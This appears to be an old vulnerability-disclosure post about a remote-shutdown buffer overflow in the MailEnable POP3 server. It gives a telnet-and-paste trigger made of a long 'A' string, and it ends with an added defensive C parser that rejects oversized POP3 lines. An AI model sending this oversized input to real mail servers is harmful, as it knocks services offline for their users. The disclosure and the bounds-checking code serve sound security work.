MailEnable POP3 Server remote shutdown !:/ -newest ~ (and previous) buffer overflow-

(My first post, please bear with me.)
-/\-About.-/\-
I found this problem while auditing a web server; it’s a standard buffer
overflow, I guess, but I am not sure how to find all the technical
information. If anyone knows what to do, I would like to know, if someone
has the time to send a brief mail or something :)


POP3 = MailEnable


-/\-Method-/\-

#telnet xxx.xxx.xxx.xxx 110

(clear screen)
+OK Welcome to MailEnable POP3 Server

(then copy and paste this- 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA - and paste it to the 
terminal)





-/\-Packet Capture-/\-


-/\-and so on-/\-

So now you have probably seen all the misspellings and so on; anyway, I hope
it won’t cloud your mind too much.



-/\-Me Me Me.-/\-
Ketil Braun Larsen.
www.nerds-united.com
Edu.
www.It-collge.dk

"Guess that where to late huh?"
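
Added example, not part of the original post and not MailEnable's code: a POP3 command-line reader in C that checks the length before copying anything, so an oversized line like the one in the post is refused instead of overflowing a fixed buffer. The function, type and constant names are hypothetical; the 255-octet line limit is taken from RFC 2449 and the 3-4 character keyword rule from RFC 1939.

```c
#include <stddef.h>
#include <string.h>

#define POP3_MAX_LINE 255   /* RFC 2449 command-line limit, CRLF included */
#define POP3_MAX_VERB 4     /* RFC 1939: keywords are 3 or 4 characters */

enum pop3_status { POP3_OK, POP3_INCOMPLETE, POP3_TOO_LONG, POP3_BAD_SYNTAX };

struct pop3_cmd {
    char verb[POP3_MAX_VERB + 1];
    char arg[POP3_MAX_LINE];     /* large enough for any accepted line */
};

/* Parse one command from a receive buffer holding `len` bytes.
 * The terminator is searched for only inside the first POP3_MAX_LINE
 * bytes, so nothing longer than that is ever copied into `out`. */
enum pop3_status pop3_parse(const unsigned char *buf, size_t len,
                            struct pop3_cmd *out)
{
    size_t scan = len < POP3_MAX_LINE ? len : POP3_MAX_LINE;
    const unsigned char *nl = memchr(buf, '\n', scan);
    if (nl == NULL)   /* no terminator yet: wait for more data or give up */
        return len >= POP3_MAX_LINE ? POP3_TOO_LONG : POP3_INCOMPLETE;

    size_t n = (size_t)(nl - buf);           /* line length without LF */
    if (n > 0 && buf[n - 1] == '\r')
        n--;                                 /* accept CRLF and bare LF */

    size_t v = 0;                            /* keyword length */
    while (v < n && buf[v] != ' ')
        v++;
    if (v < 3 || v > POP3_MAX_VERB)
        return POP3_BAD_SYNTAX;
    for (size_t i = 0; i < n; i++)           /* printable ASCII only */
        if (buf[i] < 0x20 || buf[i] > 0x7e)
            return POP3_BAD_SYNTAX;

    memcpy(out->verb, buf, v);
    out->verb[v] = '\0';
    size_t a = (v < n) ? v + 1 : n;          /* skip the separating space */
    memcpy(out->arg, buf + a, n - a);        /* n - a < POP3_MAX_LINE */
    out->arg[n - a] = '\0';
    return POP3_OK;
}
```

A server that gets POP3_TOO_LONG back should answer -ERR and close the connection rather than keep buffering.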






